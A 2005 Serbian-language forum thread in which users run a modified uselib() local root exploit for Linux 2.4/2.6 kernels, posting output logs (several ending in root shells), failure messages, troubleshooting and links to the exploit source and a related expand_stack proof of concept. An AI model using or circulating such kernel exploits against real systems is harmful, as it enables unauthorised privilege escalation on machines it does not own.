Modified uselib() local exploit

[ Shatterhand @ 28.01.2005. 17:16 ] @

Citat:

Modified uselib() local exploit for the Linux kernel series. This version has been modified to also work on SMP kernels. Linux kernel versions 2.4 up to and including 2.4.29-pre3, 2.6 up to and including 2.6.10 are affected.

Kao shto sam i ocekivao, prva modifikovana verzija je izashla.
Evo testa na mom boxu (Slackware 10, kernel 2.4.26)

shatter@fearless:~$ ./uselib

[+] SLAB cleanup
child 1 VMAs 47017
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xcfc00000 - 0xdf61f000
Wait... /
[+] race won maps=48908
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xd0acd000
[+] gate modified ( 0xffec9419 0x0804ec00 )
[+] exploited, uid=0

sh-2.05b#

Isti slucaj na josh jednom 2.4.26 (non patched).

http://www.packetstormsecurity.org/0501-exploits/uselib24.c

[ axez @ 28.01.2005. 22:00 ] @

Ne radi na 2.6 kernelu.

[ EArthquake @ 28.01.2005. 22:11 ] @

@axez
pise da radi samo na 2.4

@shatterhand
kolko je trebalo tebi da uradi race
kod mene je trajalo jedno 5 min i na kraju nije uspeo

earthquake@numenor:~/Downloads$ ./uselib24

[+] SLAB cleanup
child 1 VMAs 124
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xd7c00000 - 0xef440000
Wait... |
[+] race won maps=221
expanded VMA (0xbfffc000-0xffffe000)
[-] FAILED: find LDT (Cannot allocate memory)
CRITICAL, entering endless loop

[1]+ Stopped(SIGSTOP) ./uselib24

[ Shatterhand @ 29.01.2005. 13:07 ] @

Probao sam nekoliko puta na svom da vidim kakve rezultate daje.
Obicno uspeshno sploita nakon par sekundi ali ponekad kad je load veci od 1.5
[-] FAILED: try again (Cannot allocate memory)
load average: 2.97, 1.07, 0.44.
Testirao sam na josh par 2.4.x kernela i radio je nakon 2-3 pokushaja.
I dalje jede ram... ;)

Earth, sto se tebe tiche nije mi najbolje jasan slucaj jer koliko se ja secam
tvoj slack 10 je takodje na 2.4.26 (ne patchovan) tako da je exploitable..

[ _owl_ @ 29.01.2005. 15:25 ] @

Kod mene izgleda nesto i neradi:

Code:

child 1 VMAs 0
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc7c00000 - 0xcf7ad000
Wait... /

I ovako mogu da cekam u nedogled.
Sistem je Slackware 9.1

Code:

owl@plamicak:~$ uname -a
Linux plamicak 2.4.22 #1 SMP Thu Apr 1 13:24:31 CEST 2004 i686 unknown unknown GNU/Linux

[ Shatterhand @ 29.01.2005. 16:50 ] @

Citat:

owl@plamicak:~$ uname -a
Linux plamicak 2.4.22 #1 SMP Thu Apr 1 13:24:31 CEST 2004 i686 unknown unknown GNU/Linux

"It should be also works on 2.4 SMP, but not easy. " ;)

Ako ne sa ovim, tvoj kernel je podlozhan sploitanju expand_stack SMP race
http://www.packetstormsecurity.org/0501-exploits/stackgrow2.c (PoC)

Sve u svemu, uselib() sploit je radio na vecini kernela sto sam ja probao
za razliku od prethodne verzije. Mislim da ce se razne verzije vrteti oko
uselib() kao nekad oko do_brk.

[ littleboy @ 29.01.2005. 17:04 ] @

sasa@s1(/tmp)$ ./a.out

[+] SLAB cleanup
child 1 VMAs 622
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc0400000 - 0xc047e465
Wait... |--> prepare_slab(), 255Mb

[-] FAILED: try again
Killed
sasa@s1(/tmp)$ uname -a
Linux s1 2.4.25-grsec #2 Mon Apr 5 14:46:51 CEST 2004 i686 i686 i386 GNU/Linux
sasa@(/tmp)$

Fino.

[ Mitrović Srđan @ 29.01.2005. 17:09 ] @

Code:
bash-2.05b$ ./uselib24

[+] SLAB cleanup
    child 1 VMAs 2134
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xdf800000 - 0xfef5d000
    Wait... \
[+] race won maps=55328
    expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xe205c000
[+] gate modified ( 0xffec9419 0x0804ec00 )
[+] exploited, uid=0

sh-2.05b# id
uid=0(root) gid=0(root)
groups=102(h4x0rz),11(floppy),17(audio),18(video),19(cdrom)

Code:
sh-2.05b# uname -a
Linux digital-phear 2.4.26 #6 Mon Jun 14 19:07:27 PDT 2004 i686 unknown unknown GNU/Linux

[ weB_KiLeR @ 30.01.2005. 08:14 ] @

Code:

Mil0s@coders:~$ ./elflbl

child 1 VMAs 0
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc5000000 - 0xc9c16000
[-] FAILED: open lib (/dev/shm/_elf_lib not writable?) (Permission denied)
Killed

Linux majka ;)

[ Shatterhand @ 30.01.2005. 20:20 ] @

Code:
[-] FAILED: open lib (/dev/shm/_elf_lib not writable?) (Permission denied)

Milose, sta si ti to probao, ja pricam o novoj verziji uselib() exploita gde je
koliko se secam /dev/shm izostavljeno tj. zamenjeno sa writeable:

Code:
#define LIBNAME "/tmp/_elf_lib"